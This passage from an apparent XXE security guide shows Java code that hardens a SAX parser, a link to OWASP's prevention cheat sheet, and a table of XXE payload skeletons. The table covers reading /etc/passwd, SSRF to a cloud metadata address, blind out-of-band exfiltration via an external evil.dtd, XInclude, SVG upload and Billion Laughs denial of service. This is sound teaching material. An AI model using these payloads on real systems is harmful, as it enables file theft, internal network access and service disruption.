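      "http://apache.org/xml/features/nonvalidating/load-external-dtd", false
    );
    factory.setXIncludeAware(false);
    SAXParser parser = factory.newSAXParser();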
    🔗
    OWASP XML External Entity Prevention Cheat Sheet · cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html: comprehensive parser-by-parser reference.
    REF

    Quick Payload Reference

    Goal | Payload Skeleton
    Read local file (inline) | <!ENTITY x SYSTEM "file:///etc/passwd"> … &x;
    SSRF / internal HTTP | <!ENTITY x SYSTEM "http://169.254.169.254/..."> … &x;
    Blind OOB ping | <!ENTITY x SYSTEM "http://collaborator.id/"> … &x;
    Blind OOB + file exfil | Parameter entity → external evil.dtd → %file; in URL
    Error-based | %file; used in invalid path → error message leaks content
    XInclude (no DOCTYPE) | <xi:include parse="text" href="file:///etc/passwd"/>
    SVG upload | SVG with DOCTYPE + <text>&xxe;</text>
    DoS (Billion Laughs) | Nested entities: &lol9; expands to 10^9 copies of "lol"